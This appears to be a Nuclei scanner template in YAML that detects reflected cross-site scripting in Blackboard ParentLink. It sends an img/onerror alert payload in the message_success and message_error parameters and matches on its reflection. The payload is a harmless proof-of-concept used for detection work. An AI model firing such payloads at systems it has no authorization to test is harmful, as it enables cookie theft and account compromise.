41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: parentlink-xss
|
|
|
|
info:
|
|
name: Blackboard - Cross-Site Scripting
|
|
author: r3naissance
|
|
severity: high
|
|
description: Blackboard contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 2
|
|
tags: blackboard,parentlink,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
|
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '<img src=c onerror=alert(8675309)>'
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100f01fbc54ee3f2cdfe4643f26f8a499e39f10fd73bda2e81d5e51c30bf71a407c022100aa1ea397dd792bd9114c524a2db797783e2bbdf7de04b85bfe3b607f09b372ad:922c64590222798bb761d5b6d8e72950
|